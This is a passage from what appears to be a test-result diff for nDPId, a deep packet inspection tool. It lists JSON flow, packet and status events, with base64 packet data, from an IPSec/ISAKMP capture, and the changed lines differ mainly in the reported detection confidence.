Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":225,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946752053636,"flow_last_seen":946752053697,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946752616641,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":225,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946752053740,"flow_last_seen":946752068592,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946752616641,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":225,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946752053636,"flow_last_seen":946752053697,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1916,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946752616641,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.225","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00571{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":226,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":226,"packets-processed":225,"total-skipped-flows":0,"total-l4-payload-len":106028,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":10,"current-active-flows":2,"total-active-flows":12,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":90,"global_ts_msec":946753056378} -00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":244,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946752614924,"flow_last_seen":946753058099,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13776,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":946753058099,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00805{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":244,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946752614840,"flow_last_seen":946753056444,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946753058099,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":244,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946752614924,"flow_last_seen":946753058099,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13776,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":946753058099,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00805{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":244,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946752614840,"flow_last_seen":946753056444,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946753058099,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00571{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":245,"packets-processed":244,"total-skipped-flows":0,"total-l4-payload-len":114872,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":12,"current-active-flows":2,"total-active-flows":12,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":93,"global_ts_msec":946756085796} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756085796,"flow_last_seen":946756085796,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946756085796,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946756085796,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":474,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":474,"pkt_l4_len":440,"thread_ts_msec":946756085796,"pkt":"eJS0JASgYDjgxTWgCABFAAHMAuBAAP0RjIXAqAJkbe27wasjEZQBuEiAAAAAAFdVWmAzg3AtUnd8qAS0wgwuICMIAAAAAQAAAawjAAGQQF79b6huHtPKErITdIUO\/QjlpSHswO\/9ioYhBnLYsJUoIUmfnUpBr3Po\/OdJJVNMepzAOvSeggL2pjZTj9dKmnR3\/PM3fhBDF8NcMDQbBXvC7QxTKJZTnUfkk881X5a\/g77eRsDByk24BKRFupHgXm9JxMuUqz9AuVOnm4NBfwKTMVXjUNEQtkAzVuhsDcyqKusYnJ81cfYdIk5LwLgUQczUBvlDCka3OorgvxScDCOZppjI661UpcnKSAOl10AUzitOXX4Sf1q4\/2+eSwMmz9NIx5gR4C8OsKHWrS46IlJialinycMwsZsTGmE66+bCHIal8y8Ar1mZux6G9skkXM0\/xDcT8HX0NJm3xHn4rYAEy6+FVyThDICTkGOQ8\/OGbAHfatyTPGmM7gUHR\/CIqk2d\/5qVY\/q+N89fy1rlbMoNv1B8muSwUse4B1yQM9+HJ7F8cmircdWKEpZAIvPkrObfa2jQuXUNlIRVLPokutIPku+Rs972Lm4Ub8AH5EGOnNdgwZBbtxuUUUg4"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756085796,"flow_last_seen":946756085796,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946756085796,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756085796,"flow_last_seen":946756085796,"flow_idle_time":200000,"flow_min_l4_payload_len":432,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":432,"midstream":0,"thread_ts_msec":946756085796,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946756085939,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946756085939,"pkt":"YDjgxTWgeJS0JASgCABFAADs+pAAAPcR27Rt7bvBwKgCZBGUqyMA2MgYAAAAAFdVWmAzg3AtUnd8qAS0wgwuICMgAAAAAQAAAMwkAACwGwVeph0IkLSNrMQe9KFyeKE0QuZjK7my0+yRWqTxlzWUA3mRbb7srC4MGUsPo5STZ+eQ0KsfgOiKhZp7JjPvU1DpL0hGi1nu0ki7rscKkFtuaIb3IUMJBUDOuKDG8TawmlzjbXA5xqwrTD4Y0Fd66XG6kIfvpzqyfjU8FQSbpLWobjdeptHYBdDQ0iUIflW9bAVW8UU1fJkZpox2qaywq8WitQBykYYx17qunw=="} 00597{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946756086594,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946756086594,"pkt":"eJS0JASgYDjgxTWgCABFAACMAuFAAP0RjcTAqAJkbe27wasjEZQAeNGiAAAAAFdVWmAzg3AtUnd8qAS0wgwuICMIAAAAAgAAAGwwAABQQF79b6huHtPKErITdIUO\/aRiOYMcetOdPsiFIJLCSJQ4cF8NEcwjhKJjD422ZZANRXbfE3zsy3AffzRBbdt1fenFelwBzHh8VhUHEg=="} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00897{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946756088542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":946756088542,"pkt":"eJS0JASgYDjgxTWgCABFAAFsAtxAAP0RjOnAqAJkbe27wasjAfQBWDUKbglRU5LrZucAAAAAAAAAACEgIggAAAAAAAABUCIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAADD2Z5sNtrXmz8BOvNVblZ8eEq2k5A\/gwT84dfeS3MBtg7koKMeAMZ2TQn3soqXj5\/oVDPPLSSxj5O\/4p21wH6jJFtfjZLlhx0Y8hWCH4o4ded+u2fr012XP1MaDigsW2Zl+T0\/xFmuUZe1rDGZDhBjVPazOyZ4OL3Nkxu4by16eSkAABju+4lbxLErZd2AJ\/RH4tY7CBVRzCkAABwAAEAEUNm8N0zQnJIJGe4OghGz2QL+aNsAAAAcAABABdNtFsod1u6ziduzF06LuHj0Rn00"} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946756088542,"flow_last_seen":946756088542,"flow_idle_time":200000,"flow_min_l4_payload_len":336,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":43811,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946756088542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946756088542,"pkt":"YDjgxTWgeJS0JASgCABFAABQ+doAAPcR3QZt7bvBwKgCZAH0qyMAPCrmbglRU5LrZucAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFVk+LiqnjzgFIY5qXmyw=="} 
00929{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":946756088542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":402,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":402,"pkt_l4_len":368,"thread_ts_msec":946756088542,"pkt":"eJS0JASgYDjgxTWgCABFAAGEAt1AAP0RjNDAqAJkbe27wasjAfQBcNWobglRU5LrZucAAAAAAAAAACkgIggAAAAAAAABaCEAABgAAEAGAAFVk+LiqnjzgFIY5qXmyyIAAFwAAABYAQEACQMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIDAAAIBAAABQAAAAgEAAAOKAAAiAACAADD2Z5sNtrXmz8BOvNVblZ8eEq2k5A\/gwT84dfeS3MBtg7koKMeAMZ2TQn3soqXj5\/oVDPPLSSxj5O\/4p21wH6jJFtfjZLlhx0Y8hWCH4o4ded+u2fr012XP1MaDigsW2Zl+T0\/xFmuUZe1rDGZDhBjVPazOyZ4OL3Nkxu4by16eSkAABju+4lbxLErZd2AJ\/RH4tY7CBVRzCkAABwAAEAEUNm8N0zQnJIJGe4OghGz2QL+aNsAAAAcAABABdNtFsod1u6ziduzF06LuHj0Rn00"} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946752614924,"flow_last_seen":946753071332,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13856,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
-00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946752614840,"flow_last_seen":946753056444,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946752614924,"flow_last_seen":946753071332,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13856,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 
+00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":946752614840,"flow_last_seen":946753056444,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946756088542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.131","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00572{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":268,"packets-processed":267,"total-skipped-flows":0,"total-l4-payload-len":125706,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":14,"total-detection-updates":0,"total-updates":12,"current-active-flows":2,"total-active-flows":14,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":106,"global_ts_msec":946763512822} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512822,"flow_last_seen":946763512822,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763512822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":946763512822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946763512822,"pkt":"eJS0JASgYDjgxTWgCABFAAMktR9AAD8Rly7AqAJkbe27gSkEAfQDENJ58zGl\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\/WQ2FpE\/0RoQC4TiwB6y71I8UIovX\/cQ1SapOMuGfW9hy4WHSvXuIUgOPrCXk2h1ct5lmyWAa1qglm\/4yOrGLSsZjKKjJ5jEBzKQAAJL+95CschzVY1HdnEYlr8vcXlCOBsIZVHpL4JvobbKxYKQAAHAAAQAROj53iX5wS\/J4WHCSCKNNw1F6keAAAABwAAEAF52RZaVEd3q0Q2WSKx4bLcB8WYWw="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512822,"flow_last_seen":946763512822,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763512822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":268,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512822,"flow_last_seen":946763512822,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946763512822,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":946763512846,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946763512846,"pkt":"YDjgxTWgeJS0JASgCABFAABQmv4AAPcRPCNt7buBwKgCZAH0KQQAPLvu8zGl\/JiX39YAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAFA8j2S3SJakzYmklIQMA=="} 01518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946763512859,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946763512859,"pkt":"eJS0JASgYDjgxTWgCABFAAM8tSdAAD8Rlw7AqAJkbe27gSkEAfQDKNou8zGl\/JiX39YAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAFA8j2S3SJakzYmklIQMCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAAEvBr7sbEdUTWJ9k0dBABmZc7Ejd5+fgls2LInhXPIXof0NGEf3ShDQhLWvQwyrTOHoJp6BSg\/WQ2FpE\/0RoQC4TiwB6y71I8UIovX\/cQ1SapOMuGfW9hy4WHSvXuIUgOPrCXk2h1ct5lmyWAa1qglm\/4yOrGLSsZjKKjJ5jEBzKQAAJL+95CschzVY1HdnEYlr
8vcXlCOBsIZVHpL4JvobbKxYKQAAHAAAQAROj53iX5wS\/J4WHCSCKNNw1F6keAAAABwAAEAF52RZaVEd3q0Q2WSKx4bLcB8WYWw="} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946763512920,"flow_last_seen":946763512920,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946763512920,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.129","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946763512920,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946763512920,"pkt":"eJS0JASgYDjgxTWgCABFAANMtTNAAD8RlvLAqAJkbe27gTikEZQDODPtAAAAAPMxpfyYl9\/WLu8pUwPoTCguICMIAAAAAQAAAywjAAMQm+4T0qhYOJ2nn8k4sTj9kc7QbVpQ4eenWe\/yf1iWnoarRnrCz6rLbTdiz21Id73uIsQYj9ps3d842AEYoeFlivUsJclEwxfewHL\/212uvzvrG+KGtV7VnqNflc4njAqD+aN0hHdJ3bfB3G8UdNG7mqqVrSsJiy8fhJjLsaOPsmpd8ESjgwVJ5sr6EL4OXAH3BnG4s\/2fstg7KoXLtVbtLUQRg5Uve1+qBGOkS6LJ7LFcBVsfF5r9c72HqQLIaLNoOR2L3nyrHK+PyY\/+bsfw5GMZVLAnMrZ8sE+T6t1GE5kWiiAGMRR7ZJirFaa2JwFg15ZsNKheHSVD3rpx1b7KP1WXUOZC\/Cb6Aw1MpJ4V9VdsJox\/Q+Gat14OqUFcQXGFUGieDanmPlJW826dtpGd+j\/yIgb6YQhgOtVocZ5NCFUDN6oWlUPj31oEHoVK+93sMlOEGbCSHY+jAaaIsBbEBxgqESHwkQapoNTPkPv+aTg6OMGZ0YsNAPpHlAoFKtWaGaAr1i6\/QEqqSekQi27J